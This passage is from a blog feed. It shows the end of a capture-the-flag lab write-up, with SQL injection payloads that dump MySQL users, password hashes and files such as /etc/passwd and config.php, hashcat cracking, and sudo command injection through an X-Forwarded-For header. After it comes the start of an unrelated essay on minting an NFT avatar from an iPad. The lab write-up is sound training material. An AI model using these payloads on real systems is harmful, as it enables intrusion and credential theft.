|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=4/27%OT=22%CT=1%CU=31913%PV=Y%DS=2%DC=T%G=Y%TM=644B3AD
OS:9%P=aarch64-unknown-linux-gnu)SEQ(SP=100%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS
OS:=A)OPS(O1=M550ST11NW7%O2=M550ST11NW7%O3=M550NNT11NW7%O4=M550ST11NW7%O5=M
OS:550ST11NW7%O6=M550ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE
OS:88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M550NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A
OS:%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y
OS:%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T
OS:=40%CD=S)

Uptime guess: 27.230 days (since Fri Mar 31 15:46:20 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT      ADDRESS
1   56.02 ms 10.10.14.1
2   56.12 ms 10.129.202.139

NSE: Script Post-scanning.
Initiating NSE at 21:17
Completed NSE at 21:17, 0.00s elapsed
Initiating NSE at 21:17
Completed NSE at 21:17, 0.00s elapsed
Initiating NSE at 21:17
Completed NSE at 21:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.07 seconds
           Raw packets sent: 66144 (2.914MB) | Rcvd: 65710 (2.632MB)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, we definitely have an open SSH port now! But what user to use?&lt;/p&gt;
&lt;p&gt;Maybe there’s password re-use with MySQL? Let’s see what we’ve got:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code&gt;&#039; UNION SELECT COUNT(*) FROM mysql.user -- 1&lt;/code&gt; shows that we have 6 users.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&#039; UNION SELECT user FROM mysql.user LIMIT 1 OFFSET 0 -- 1&lt;/code&gt; (and iterating) shows that these users are &lt;code&gt;debian-sys-maint&lt;/code&gt;, &lt;code&gt;mysql.infoschema&lt;/code&gt;, &lt;code&gt;mysql.session&lt;/code&gt;, &lt;code&gt;mysql.sys&lt;/code&gt;, &lt;code&gt;root&lt;/code&gt;, and &lt;code&gt;uhc&lt;/code&gt;. Both &lt;code&gt;root&lt;/code&gt; and &lt;code&gt;uhc&lt;/code&gt; look promising.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&#039; UNION SELECT host FROM mysql.user WHERE user = &#039;root&#039; -- 1&lt;/code&gt; (and &lt;code&gt;uhc&lt;/code&gt;) shows that both are permitted to login from &lt;code&gt;localhost&lt;/code&gt; (though that may not mean anything, since this is just database access).&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&#039; UNION SELECT authentication_string FROM mysql.user WHERE user = &#039;root&#039; -- 1&lt;/code&gt; (and &lt;code&gt;uhc&lt;/code&gt;) reveals that &lt;code&gt;root&lt;/code&gt; &lt;em&gt;doesn’t&lt;/em&gt; have a password, but &lt;code&gt;uhc&lt;/code&gt; does have a password hash. (Apparently there’s no &lt;code&gt;password&lt;/code&gt; column in the &lt;code&gt;mysql.users&lt;/code&gt; table anymore; it’s now called &lt;code&gt;authentication_string&lt;/code&gt; per &lt;a href=&quot;https://dev.mysql.com/doc/refman/8.0/en/grant-tables.html#grant-tables-user-db&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;the documentation&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;.)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Unfortunately, it turns out that we can’t just feed this hash into &lt;a href=&quot;https://www.openwall.com/john/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;john&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; or &lt;a href=&quot;https://hashcat.net/hashcat/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Hashcat&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, but need to &lt;a href=&quot;https://www.percona.com/blog/brute-force-mysql-password-from-a-hash/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;massage things a bit first&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;First, we use ​&lt;code&gt;&#039; UNION SELECT CONCAT(&#039;$mysql&#039;,LEFT(authentication_string,6),&#039;*&#039;,INSERT(HEX(SUBSTR(authentication_string,8)),41,0,&#039;*&#039;)) FROM mysql.user WHERE user = &#039;uhc&#039;&lt;/code&gt;​ to get a string that &lt;a href=&quot;https://hashcat.net/hashcat/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Hashcat&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; can handle.&lt;/li&gt;
&lt;li&gt;Then we run &lt;code&gt;hashcat -m 7401 -O hash.txt rockyou.txt&lt;/code&gt;.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;But, this is going to take a loooong time… So, I tried a few other things:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;There’s 6 users in the &lt;code&gt;players&lt;/code&gt; table, but none of them work as passwords (or alternate user names).&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&#039; UNION SELECT LOAD_FILE(&#039;/etc/passwd&#039;) -- 1&lt;/code&gt; displays the password file, but I can’t access /etc/shadow, so it doesn’t look like we’re running as root.&lt;/li&gt;
&lt;li&gt;But we can look at other files, including /config.php! And it turns out that there’s a cleartext password there that we can read with &lt;code&gt;&#039; UNION SELECT LOAD_FILE(&#039;/var/www/html/config.php&#039;) -- 1&lt;/code&gt; : &lt;code&gt;uhc-11qual-global-pw&lt;/code&gt;. ​&lt;em&gt;This works to log in as the &lt;code&gt;uhc&lt;/code&gt; user!&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The &lt;strong&gt;first flag&lt;/strong&gt; is then in the user.txt file in /home/uhc.&lt;/p&gt;
&lt;p&gt;Unfortunately, uhc isn’t in the sudoers file, and there’s no obviously vulnerably SUID binaries or files with loose permissions.&lt;/p&gt;
&lt;p&gt;But…&lt;/p&gt;
&lt;p&gt;If you run &lt;code&gt;&#039; UNION SELECT LOAD_FILE(&#039;/var/www/html/firewall.php&#039;) -- 1&lt;/code&gt; , you’ll see that the &lt;em&gt;web server&lt;/em&gt; has sudo access, and uses it to make a call to iptables using the value of either the X-Forwarded-For or Remote-Host headers. And since this call is just a concatenation of the value of this header wrapped in PHP’s &lt;code&gt;system()&lt;/code&gt; call, that means &lt;em&gt;I&lt;/em&gt; can insert whatever I want. For example, setting&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;http&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;http&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;tag&quot;&gt;X-Forwarded-For&lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;:&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; 127.0.0.1 -j ACCEPT; sudo ls -la /root ; echo&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;lists the contents of the /root directory, revealing the standard /root/root.txt flag file. And thus&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;http&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;http&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-dark:#8EC07C&quot; data-token-type=&quot;tag&quot;&gt;X-Forwarded-For&lt;/span&gt;&lt;span style=&quot;--shiki-light:#9D0006;--shiki-dark:#FB4934&quot; data-token-type=&quot;keyword&quot;&gt;:&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; 127.0.0.1 -j ACCEPT; sudo cat /root/root.txt ; echo&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;will return the contents of that file.&lt;/p&gt;
&lt;p&gt;Which just so happens to be the ​&lt;strong&gt;second flag&lt;/strong&gt;​.&lt;/p&gt;
&lt;p&gt;(Really, I &lt;em&gt;should&lt;/em&gt; have used this trick to get both flags…)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Elapsed Time:&lt;/strong&gt; 4 h 6 min&lt;/p&gt; ]]></description>
    <pubDate>Thu, 27 Apr 2023 00:00:00 GMT</pubDate>
  </item><item>
    <title>Trying (and failing) to deploy a smart contract using an iPad Pro</title>
    <link>https://remarks.delphi-strategy.com/essays/2022-11-27</link>
    <guid>https://remarks.delphi-strategy.com/essays/2022-11-27</guid>
    <description><![CDATA[ &lt;h1 id=&quot;trying-and-failing-to-deploy-a-smart-contract-using-an-ipad-pro&quot;&gt;Trying (and failing) to deploy a smart contract using an iPad Pro&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#trying-and-failing-to-deploy-a-smart-contract-using-an-ipad-pro&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt;My personal project this weekend was to deploy a smart contract to the Ethereum blockchain. The motivation here was to be able to mint an NFT (really, several NFTs) for use as an avatar on &lt;a href=&quot;https://www.farcaster.xyz/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Farcaster&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, an alternative to Twitter that &lt;a href=&quot;https://fcast.me/necopinus&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;I’ve been experimenting with&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; for a few weeks now. Using an NFT as your avatar on Farcaster adds a “&lt;a href=&quot;https://farcasterxyz.notion.site/How-to-get-a-purple-checkmark-fb66f0cb0f5f4f24b699b8f288a2f14a&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;purple checkmark&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;” to your account, a spoof on Twitter’s infamous &lt;a href=&quot;https://help.twitter.com/managing-your-account/about-twitter-verified-accounts&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;blue checkmark&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;(For those who are interested, &lt;a href=&quot;https://support.opensea.io/hc/en-us/articles/4415562648851-How-do-I-set-my-NFT-as-my-Twitter-profile-picture-&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Twitter provides the ability to set an NFT as your avatar&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, though you need to subscribe to “Twitter Blue” and be using iOS in order to access this feature.)&lt;/p&gt;
&lt;p&gt;The central problem here is that if I use an NFT as my avatar, then I need to pay for another NFT (either to buy one or mint one myself) whenever I decide I want to change my avatar. Also, my current (and favorite) avatar is taken from a &lt;a href=&quot;https://dangerousminds.net/comments/the_artist_who_visited_dune&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;John Schoenherr&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; painting of one of the great sandworms of Arrakis - I’m not sure I want to “mint” that in any way that could be interpreted as me claiming “ownership” of it. It’s Schoenherr’s painting after all!&lt;/p&gt;
&lt;p&gt;Finally, all of the services I’ve seen that allow you to mint your own NFT store the associated JSON metadata and image file using a decentralized solution like &lt;a href=&quot;https://ipfs.tech/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;IPFS&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; or &lt;a href=&quot;https://www.arweave.org/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Arweave&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;. This is actually a good thing, because it gives “collectable” NFTs a degree of permanence, but in my case I actually &lt;em&gt;want&lt;/em&gt; to be able to update the associated metadata and image arbitrarily. Fortunately, I control my own domain and &lt;a href=&quot;https://eips.ethereum.org/EIPS/eip-721&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;EIP-721&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; (which defines the NFT standard) doesn’t forbid using “non-permenant” URIs, so all this means is that I need to deploy my own smart contract to create my NFT avatar(s), rather than using a pre-packaged solution.&lt;/p&gt;
&lt;p&gt;That all sounds easy enough, but I &lt;em&gt;also&lt;/em&gt; wanted to try to do this using only my iPad Pro, since I regard that as a more secure computing device than a regular desktop. (In fact, I’ve gradually come to prefer my iPad Pro over my laptop, so it’s not &lt;em&gt;just&lt;/em&gt; about system security.) As you can probably guess from the title of this post, I failed to accomplish this particular goal… Though I came &lt;em&gt;very&lt;/em&gt; close to succeeding!&lt;/p&gt;
&lt;p&gt;While working on the iPad, I used Safari with the &lt;a href=&quot;https://wallet.light.so&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Light Wallet&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; extension for interacting with the Ethereum blockchain.&lt;/p&gt;
&lt;p&gt;As fate would have it, I started using a standard location for my avatar (&lt;a href=&quot;https://necopinus.xyz/%E2%80%8Bavatar/%E2%80%8Bavatar.webp&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;https://necopinus.xyz/​avatar/​avatar.webp&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;) when I set up my ENS domains. For some reason the correct URL isn’t showing up on &lt;a href=&quot;https://app.ens.domains/name/necopinus.xyz/details&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;the ENS console&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, even though it appears to be set when I view it in the controlling &lt;a href=&quot;https://app.safe.global/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Safe&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; app. I’m not sure why this is, but the important thing is that I already have a standard location for my avatar.&lt;/p&gt;
&lt;p&gt;The first real step was thus to upload a JSON metadata file pointing to this avatar.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;json&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;json&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;{&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;	&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#689D6A;--shiki-dark:#689D6A&quot; data-token-type=&quot;property&quot;&gt;description&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;:&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;string&quot;&gt;The avatar NFT for necopinus.&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;,&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;	&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#689D6A;--shiki-dark:#689D6A&quot; data-token-type=&quot;property&quot;&gt;external_url&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;:&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;string&quot;&gt;https://necopinus.xyz/&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;,&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;	&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#689D6A;--shiki-dark:#689D6A&quot; data-token-type=&quot;property&quot;&gt;image&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;:&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;string&quot;&gt;https://necopinus.xyz/avatar/avatar.webp&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;,&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;	&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#689D6A;--shiki-dark:#689D6A&quot; data-token-type=&quot;property&quot;&gt;name&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;:&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;string&quot;&gt;necopinus&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; 